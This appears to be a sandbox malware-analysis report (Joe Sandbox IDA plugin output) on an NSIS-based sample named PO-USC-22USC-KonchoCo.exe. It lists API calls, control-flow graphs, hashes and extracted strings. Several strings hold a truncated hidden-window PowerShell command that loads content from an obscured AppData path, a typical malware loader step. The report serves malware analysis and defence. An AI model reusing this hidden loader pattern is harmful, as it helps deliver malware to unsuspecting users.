                                                        • Associated: 00000000.00000002.1702600908.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1702600908.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1702600908.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1702600908.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1702600908.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1702600908.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1704346344.000000000044E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1704346344.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_PO-USC-22USC-KonchoCo.jbxd
                                                        Similarity
                                                        • API ID: Directory$FreeFromListPathSystemTaskWindowslstrcatlstrlen
                                                        • String ID: "powershell.exe" -windowstyle hidden "$Moralioralist=Get-Content 'C:\Users\user\AppData\Roaming\brosy\udrulnings\Depravingly238\A$: Completed$Completed$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
                                                        • API String ID: 4024019347-3929350441
                                                        • Opcode ID: 6f2761d7cb5587a470c052371fa5fb6b0836c691dcd2ac77b9ed8a87730eab65
                                                        • Instruction ID: 4a93dbd931fcfc477af1f24740db1e2af50c51fdf4929e220b088375b48f32a9
                                                        • Opcode Fuzzy Hash: 6f2761d7cb5587a470c052371fa5fb6b0836c691dcd2ac77b9ed8a87730eab65
                                                        • Instruction Fuzzy Hash: 586147B26053005BEB206F25DD80B6B77E8AB54318F26453FF587B22D0DB3C8961875E
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 579 401774-401799 call 402dab call 405fc8 584 4017a3-4017b5 call 406682 call 405f51 lstrcatW 579->584 585 40179b-4017a1 call 406682 579->585 590 4017ba-4017bb call 406930 584->590 585->590 594 4017c0-4017c4 590->594 595 4017c6-4017d0 call 4069df 594->595 596 4017f7-4017fa 594->596 603 4017e2-4017f4 595->603 604 4017d2-4017e0 CompareFileTime 595->604 597 401802-40181e call 406172 596->597 598 4017fc-4017fd call 40614d 596->598 606 401820-401823 597->606 607 401892-4018bb call 405707 call 403376 597->607 598->597 603->596 604->603 608 401874-40187e call 405707 606->608 609 401825-401863 call 406682 * 2 call 4066bf call 406682 call 405ce2 606->609 619 4018c3-4018cf SetFileTime 607->619 620 4018bd-4018c1 607->620 621 401887-40188d 608->621 609->594 641 401869-40186a 609->641 623 4018d5-4018e0 FindCloseChangeNotification 619->623 620->619 620->623 624 402c38 621->624 627 4018e6-4018e9 623->627 628 402c2f-402c32 623->628 626 402c3a-402c3e 624->626 631 4018eb-4018fc call 4066bf lstrcatW 627->631 632 4018fe-401901 call 4066bf 627->632 628->624 638 401906-4023a7 call 405ce2 631->638 632->638 638->626 638->628 641->621 643 40186c-40186d 641->643 643->608
                                                        APIs
                                                        • lstrcatW.KERNEL32(00000000,00000000), ref: 004017B5
                                                        • CompareFileTime.KERNEL32(-00000014,?,"powershell.exe" -windowstyle hidden "$Moralioralist=Get-Content 'C:\Users\user\AppData\Roaming\brosy\udrulnings\Depravingly238\A,"powershell.exe" -windowstyle hidden "$Moralioralist=Get-Content 'C:\Users\user\AppData\Roaming\brosy\udrulnings\Depravingly238\A,00000000,00000000,"powershell.exe" -windowstyle hidden "$Moralioralist=Get-Content 'C:\Users\user\AppData\Roaming\brosy\udrulnings\Depravingly238\A,C:\Users\user\AppData\Roaming\brosy\udrulnings\Depravingly238\Schokker\Alkoholeksperter\styrtning\Tedeummernes,?,?,00000031), ref: 004017DA
                                                          • Part of subcall function 00406682: lstrcpynW.KERNEL32(?,?,00000400,004037B7,00428A60,NSIS Error,?,00000008,0000000A,0000000C), ref: 0040668F
                                                          • Part of subcall function 00405707: lstrlenW.KERNEL32(Completed,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,004030AD,00000000,?), ref: 0040573F
                                                          • Part of subcall function 00405707: lstrlenW.KERNEL32(004030AD,Completed,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,004030AD,00000000), ref: 0040574F
                                                          • Part of subcall function 00405707: lstrcatW.KERNEL32(Completed,004030AD), ref: 00405762
                                                          • Part of subcall function 00405707: SetWindowTextW.USER32(Completed,Completed), ref: 00405774
                                                          • Part of subcall function 00405707: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040579A
                                                          • Part of subcall function 00405707: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 004057B4
                                                          • Part of subcall function 00405707: SendMessageW.USER32(?,00001013,?,00000000), ref: 004057C2
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1702485461.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1702434670.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1702563174.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1702600908.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1702600908.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1702600908.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1702600908.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1702600908.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1702600908.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1702600908.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1704346344.000000000044E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1704346344.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_PO-USC-22USC-KonchoCo.jbxd
                                                        Similarity
                                                        • API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
                                                        • String ID: "powershell.exe" -windowstyle hidden "$Moralioralist=Get-Content 'C:\Users\user\AppData\Roaming\brosy\udrulnings\Depravingly238\A$C:\Users\user\AppData\Roaming\brosy\udrulnings\Depravingly238\Schokker\Alkoholeksperter\styrtning\Tedeummernes$afsmitningernes$distributed\Ristingets\
                                                        • API String ID: 1941528284-2361279963
                                                        • Opcode ID: 32c4a55105527fe5635505d43395af282a95c9cc107a8a3e81d671ed76634ab9
                                                        • Instruction ID: 8b6fd23670850fd9ae356807d0398338211ecbfbdba6d544e24b7f39de498ea1
                                                        • Opcode Fuzzy Hash: 32c4a55105527fe5635505d43395af282a95c9cc107a8a3e81d671ed76634ab9
                                                        • Instruction Fuzzy Hash: 7541A331900109FACF11BBB5CD85DAE7A79EF41329B21423FF422B10E1D73D8A91966D
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 645 405707-40571c 646 405722-405733 645->646 647 4057d3-4057d7 645->647 648 405735-405739 call 4066bf 646->648 649 40573e-40574a lstrlenW 646->649 648->649 651 405767-40576b 649->651 652 40574c-40575c lstrlenW 649->652 654 40577a-40577e 651->654 655 40576d-405774 SetWindowTextW 651->655 652->647 653 40575e-405762 lstrcatW 652->653 653->651 656 405780-4057c2 SendMessageW * 3 654->656 657 4057c4-4057c6 654->657 655->654 656->657 657->647 658 4057c8-4057cb 657->658 658->647
                                                        APIs
                                                        • lstrlenW.KERNEL32(Completed,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,004030AD,00000000,?), ref: 0040573F
                                                        • lstrlenW.KERNEL32(004030AD,Completed,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,004030AD,00000000), ref: 0040574F
                                                        • lstrcatW.KERNEL32(Completed,004030AD), ref: 00405762
                                                        • SetWindowTextW.USER32(Completed,Completed), ref: 00405774
                                                        • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040579A
                                                        • SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 004057B4
                                                        • SendMessageW.USER32(?,00001013,?,00000000), ref: 004057C2
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1702485461.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1702434670.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1702563174.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1702600908.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1702600908.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1702600908.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1702600908.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1702600908.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1702600908.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1702600908.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1704346344.000000000044E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1704346344.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_PO-USC-22USC-KonchoCo.jbxd
                                                        Similarity
                                                        • API ID: MessageSend$lstrlen$TextWindowlstrcat
                                                        • String ID: Completed
                                                        • API String ID: 2531174081-3087654605
                                                        • Opcode ID: 478899543bd82950d8a4d30903f75c7e93d106f960787587e0f6081d0d83e678
                                                        • Instruction ID: 0122bdc4cc194b68d617bf21deccaf32741d68d09ea49b6ef8aede989cb0ca1f
                                                        • Opcode Fuzzy Hash: 478899543bd82950d8a4d30903f75c7e93d106f960787587e0f6081d0d83e678
                                                        • Instruction Fuzzy Hash: F9219D71900618FACF119FA5DD84ACFBFB9EF45364F10843AF904B62A0C7794A419FA8
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Control-flow Graph

                                                        APIs
                                                        • GetDC.USER32(?), ref: 00401E56
                                                        • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401E70
                                                        • MulDiv.KERNEL32(00000000,00000000), ref: 00401E78
                                                        • ReleaseDC.USER32(?,00000000), ref: 00401E89
                                                        • CreateFontIndirectW.GDI32(0040CDF8), ref: 00401ED8
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1702485461.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1702434670.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1702563174.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1702600908.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1702600908.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1702600908.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1702600908.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1702600908.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1702600908.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1702600908.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1704346344.000000000044E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1704346344.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_PO-USC-22USC-KonchoCo.jbxd
                                                        Similarity
                                                        • API ID: CapsCreateDeviceFontIndirectRelease
                                                        • String ID: Times New Roman
                                                        • API String ID: 3808545654-927190056
                                                        • Opcode ID: 9330b341f5ec5a6b3a5ee45025c1e4f07807d780444240919f5b9aad752ac9f7
                                                        • Instruction ID: 3094fbe596e336cf4bf26b394f16fb1ed862d687e7810168c788cd964747d1d2
                                                        • Opcode Fuzzy Hash: 9330b341f5ec5a6b3a5ee45025c1e4f07807d780444240919f5b9aad752ac9f7
                                                        • Instruction Fuzzy Hash: 74018871904240EFE7005BB4EE99BDD3FB4AF15301F20997AF581B62E2C6B904859BED
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 668 406a06-406a26 GetSystemDirectoryW 669 406a28 668->669 670 406a2a-406a2c 668->670 669->670 671 406a3d-406a3f 670->671 672 406a2e-406a37 670->672 674 406a40-406a73 wsprintfW LoadLibraryExW 671->674 672->671 673 406a39-406a3b 672->673 673->674
                                                        APIs
                                                        • GetSystemDirectoryW.KERNEL32(?,00000104), ref: 00406A1D
                                                        • wsprintfW.USER32 ref: 00406A58
                                                        • LoadLibraryExW.KERNELBASE(?,00000000,00000008), ref: 00406A6C
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1702485461.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1702434670.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1702563174.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1702600908.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1702600908.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1702600908.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1702600908.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1702600908.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1702600908.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1702600908.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1704346344.000000000044E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1704346344.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_PO-USC-22USC-KonchoCo.jbxd
                                                        Similarity
                                                        • API ID: DirectoryLibraryLoadSystemwsprintf
                                                        • String ID: %s%S.dll$UXTHEME
                                                        • API String ID: 2200240437-1106614640
                                                        • Opcode ID: bea2c3dfad6db3553b24c87bd1a60070de232aee380c5cee9c100d0800ee2260
                                                        • Instruction ID: 2238e0f1a46f5e25e3951852f43a11dddaa5b7c7f32292af2b6637a080077407
                                                        • Opcode Fuzzy Hash: bea2c3dfad6db3553b24c87bd1a60070de232aee380c5cee9c100d0800ee2260
                                                        • Instruction Fuzzy Hash: DFF0FC30601119A7CB14BB68DD0EFAB375C9B01704F10847AA646F10D0EB789664CF98
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 675 4061a1-4061ad 676 4061ae-4061e2 GetTickCount GetTempFileNameW 675->676 677 4061f1-4061f3 676->677 678 4061e4-4061e6 676->678 680 4061eb-4061ee 677->680 678->676 679 4061e8 678->679 679->680
                                                        APIs
                                                        • GetTickCount.KERNEL32 ref: 004061BF
                                                        • GetTempFileNameW.KERNELBASE(?,?,00000000,?,?,?,00000000,00403643,1033,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040392F), ref: 004061DA
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1702485461.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1702434670.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1702563174.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1702600908.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1702600908.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1702600908.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1702600908.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1702600908.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1702600908.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1702600908.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1704346344.000000000044E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1704346344.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_PO-USC-22USC-KonchoCo.jbxd
                                                        Similarity
                                                        • API ID: CountFileNameTempTick
                                                        • String ID: C:\Users\user\AppData\Local\Temp\$nsa
                                                        • API String ID: 1716503409-678247507
                                                        • Opcode ID: ca4f867381b256d976a036b4ee2479ffffcb38332db50c9e5a73bf50e74bc53e
                                                        • Instruction ID: d5af49f5aac0e4cb02feadf6e990f33ccb34da23aa7fbf3522b8764b63faf6c0
                                                        • Opcode Fuzzy Hash: ca4f867381b256d976a036b4ee2479ffffcb38332db50c9e5a73bf50e74bc53e
                                                        • Instruction Fuzzy Hash: 90F09076701204BFEB008F59DD05E9EB7BCEBA5710F11803EF901F7240E6B49A648764
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 765 4015c6-4015da call 402dab call 405ffc 770 401636-401639 765->770 771 4015dc-4015ef call 405f7e 765->771 773 401668-4022fb call 401423 770->773 774 40163b-40165a call 401423 call 406682 SetCurrentDirectoryW 770->774 780 4015f1-4015f4 771->780 781 401609-40160c call 405c30 771->781 788 402c2f-402c3e 773->788 774->788 791 401660-401663 774->791 780->781 782 4015f6-4015fd call 405c4d 780->782 789 401611-401613 781->789 782->781 796 4015ff-401607 call 405bd6 782->796 792 401615-40161a 789->792 793 40162c-401634 789->793 791->788 797 401629 792->797 798 40161c-401627 GetFileAttributesW 792->798 793->770 793->771 796->789 797->793 798->793 798->797
                                                        APIs
                                                          • Part of subcall function 00405FFC: CharNextW.USER32(?,?,00425750,?,00406070,00425750,00425750,74DF3420,?,74DF2EE0,00405DAE,?,74DF3420,74DF2EE0,"C:\Users\user\Desktop\PO-USC-22USC-KonchoCo.exe"), ref: 0040600A
                                                          • Part of subcall function 00405FFC: CharNextW.USER32(00000000), ref: 0040600F
                                                          • Part of subcall function 00405FFC: CharNextW.USER32(00000000), ref: 00406027
                                                        • GetFileAttributesW.KERNELBASE(?,?,00000000,0000005C,00000000,000000F0), ref: 0040161F
                                                          • Part of subcall function 00405BD6: CreateDirectoryW.KERNEL32(0042C800,?), ref: 00405C18
                                                        • SetCurrentDirectoryW.KERNELBASE(?,C:\Users\user\AppData\Roaming\brosy\udrulnings\Depravingly238\Schokker\Alkoholeksperter\styrtning\Tedeummernes,?,00000000,000000F0), ref: 00401652
                                                        Strings
                                                        • C:\Users\user\AppData\Roaming\brosy\udrulnings\Depravingly238\Schokker\Alkoholeksperter\styrtning\Tedeummernes, xrefs: 00401645
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1702485461.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1702434670.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1702563174.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1702600908.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1702600908.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1702600908.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1702600908.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1702600908.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1702600908.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1702600908.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1704346344.000000000044E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1704346344.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_PO-USC-22USC-KonchoCo.jbxd
                                                        Similarity
                                                        • API ID: CharNext$Directory$AttributesCreateCurrentFile
                                                        • String ID: C:\Users\user\AppData\Roaming\brosy\udrulnings\Depravingly238\Schokker\Alkoholeksperter\styrtning\Tedeummernes
                                                        • API String ID: 1892508949-2643801205
                                                        • Opcode ID: aa5dd310b5d70740701a2a3e4b5f3b448a7aae78f9a2a95781e07c92bd5766b4
                                                        • Instruction ID: 68e4a3e0657f1f56d5d8600c1d99eb964219fead50354605c61944b677c9a350
                                                        • Opcode Fuzzy Hash: aa5dd310b5d70740701a2a3e4b5f3b448a7aae78f9a2a95781e07c92bd5766b4
                                                        • Instruction Fuzzy Hash: DD11BE31404214ABCF20AFB5CD0099F36B0EF04368B25493FE946B22F1DA3E4A819B5E
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 801 406059-406074 call 406682 call 405ffc 806 406076-406078 801->806 807 40607a-406087 call 406930 801->807 808 4060d2-4060d4 806->808 811 406097-40609b 807->811 812 406089-40608f 807->812 814 4060b1-4060ba lstrlenW 811->814 812->806 813 406091-406095 812->813 813->806 813->811 815 4060bc-4060d0 call 405f51 GetFileAttributesW 814->815 816 40609d-4060a4 call 4069df 814->816 815->808 821 4060a6-4060a9 816->821 822 4060ab-4060ac call 405f9d 816->822 821->806 821->822 822->814
                                                        APIs
                                                          • Part of subcall function 00406682: lstrcpynW.KERNEL32(?,?,00000400,004037B7,00428A60,NSIS Error,?,00000008,0000000A,0000000C), ref: 0040668F
                                                          • Part of subcall function 00405FFC: CharNextW.USER32(?,?,00425750,?,00406070,00425750,00425750,74DF3420,?,74DF2EE0,00405DAE,?,74DF3420,74DF2EE0,"C:\Users\user\Desktop\PO-USC-22USC-KonchoCo.exe"), ref: 0040600A
                                                          • Part of subcall function 00405FFC: CharNextW.USER32(00000000), ref: 0040600F
                                                          • Part of subcall function 00405FFC: CharNextW.USER32(00000000), ref: 00406027
                                                        • lstrlenW.KERNEL32(00425750,00000000,00425750,00425750,74DF3420,?,74DF2EE0,00405DAE,?,74DF3420,74DF2EE0,"C:\Users\user\Desktop\PO-USC-22USC-KonchoCo.exe"), ref: 004060B2
                                                        • GetFileAttributesW.KERNELBASE(00425750,00425750,00425750,00425750,00425750,00425750,00000000,00425750,00425750,74DF3420,?,74DF2EE0,00405DAE,?,74DF3420,74DF2EE0), ref: 004060C2
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1702485461.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1702434670.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1702563174.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1702600908.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1702600908.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1702600908.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1702600908.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1702600908.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1702600908.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1702600908.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1704346344.000000000044E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1704346344.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_PO-USC-22USC-KonchoCo.jbxd
                                                        Similarity
                                                        • API ID: CharNext$AttributesFilelstrcpynlstrlen
                                                        • String ID: PWB
                                                        • API String ID: 3248276644-4275379341
                                                        • Opcode ID: 8ac32a27a18f4c2dd493eafaed9bce6c13b36ca5a95e32c2f60d88480e43d1b4
                                                        • Instruction ID: c6e62d849c1808a59ce2984a64bb42424f7e4e7bb9f9a1371c2689eace45329e
                                                        • Opcode Fuzzy Hash: 8ac32a27a18f4c2dd493eafaed9bce6c13b36ca5a95e32c2f60d88480e43d1b4
                                                        • Instruction Fuzzy Hash: 17F04426144E6219D632723A0C05EAF26148F82354B57463FF853B22D1DF3C8D62C17E
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1702485461.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1702434670.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1702563174.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1702600908.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1702600908.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1702600908.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1702600908.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1702600908.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1702600908.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1702600908.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1704346344.000000000044E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1704346344.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_PO-USC-22USC-KonchoCo.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 5aa4d090f2ad8984d83f4f4e641c2e75da78772a5538c6e641319c1bffeb23fb
                                                        • Instruction ID: 5108979c3f50e514b4d7e1fb6dd8ed840f295859cf3be547aab63c341a9fbe83
                                                        • Opcode Fuzzy Hash: 5aa4d090f2ad8984d83f4f4e641c2e75da78772a5538c6e641319c1bffeb23fb
                                                        • Instruction Fuzzy Hash: 8BA14471E04228DBDF28CFA8C8446ADBBB1FF44305F14856AD856BB281C7786A86DF45
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1702485461.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1702434670.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1702563174.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1702600908.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
